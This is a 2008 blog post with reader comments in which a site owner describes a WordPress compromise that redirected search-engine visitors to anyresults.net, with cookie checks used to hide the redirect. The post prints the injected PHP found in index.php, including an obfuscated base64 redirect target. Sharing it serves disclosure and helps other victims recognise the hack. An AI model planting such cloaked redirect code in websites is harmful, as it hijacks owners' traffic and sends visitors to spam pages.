WordPress Hacked, Search Engine Traffic Stolen by AnyResults.net

by Michael on June 5, 2008 · 5 comments

Something scary happened today at one of my other sites. Around 3:30 EDT, I noticed that I was getting many fewer visitors than normal. Upon further investigation, I realized that my search engine traffic had all but dried up. Thinking I had been banned by Google, I dug deeper.


Oddly enough, I still ranked well for all of the terms that had brought me traffic in the past. So what was happening? If I was still ranking well in the SERPs, why weren’t people clicking through?

Unsure of what else to do, I enlisted the help of some friends. Among other things, I asked these guys to search for a few keywords to see if my rankings were holding up. As it turns out, my search results were just fine, ruling out the possibility that Google had rolled out new search data that simply hadn’t filtered down to our neck of the woods.

And then it happened…

One of my friends clicked on a Google search result and was redirected elsewhere. But when he clicked it again, all was well. When I reported this to another friend, he saw something similar.

As it turns out, I was the victim of a WordPress hack that stole pretty much all of my search traffic, but somehow hid itself using cookies. Upon further inspection, I discovered the following bit of code at the top of index.php:

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }
if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>

If you hit Google without the cookie and tried to click through to my site, you were directed elsewhere. But once it happened to you once, it couldn’t be repeated until you cleared your cookies. Very sneaky.

So where was all of my traffic going?

It was being shunted through www.anyresult.net (no link for you!) and then winding up at a spammy, ad-filled landing page on www.dealtime.com (again, no link for you — I’ve helped enough today). I suspect that dealtime.com had likewise been compromised, though I can’t say for sure.

I’m still not sure how they got in, but I’ve reported it to my host, cleaned everything up, and changed all of my passwords. For reference, I was running WordPress 2.3.3, though I have since upgraded to WordPress 2.5.1.

Before you ask, yes, I’m aware that I was taking a slight risk by running a slightly older version of WordPress. In my defense, however, early releases of major WordPress updates often have numerous bugs of their own. As such, I typically wait until at X.X.2 before upgrading unless a serious hole is discovered in the version that I’m currently using.

Guess what? I just found one.


{ 5 comments… read them below or add one }

Eden June 5, 2008 at 5:20 pm

That’s a drag. Thanks for sharing the details though. Certainly that would be difficult to diagnose, but having the string of code you posted to reference will make it easy to find for anyone else who has been hacked.

Reply

Pinyo June 6, 2008 at 9:01 am

I am sorry to hear about the incident. I am glad to see you recovered quickly.

Reply

Bob June 7, 2008 at 12:15 pm

Hello,

My blogs are suffering from the same hack.

How exactly did you clean it up?

Just remove the code from index/php?

Reply

John June 8, 2008 at 7:49 am

For what it’s worth I was running 2.5.1 and also go hacked.

The only difference seems to be the code going to wp-blog-header.php instead of index.php

Reply

Alycia August 26, 2014 at 10:54 am

Howdy! Would you mind if I share your blog with
my twitter group? There’s a lot of people that I think would really enjoy your content.
Please let me know. Thank you

Reply

Leave a Comment

Previous post:

Next post: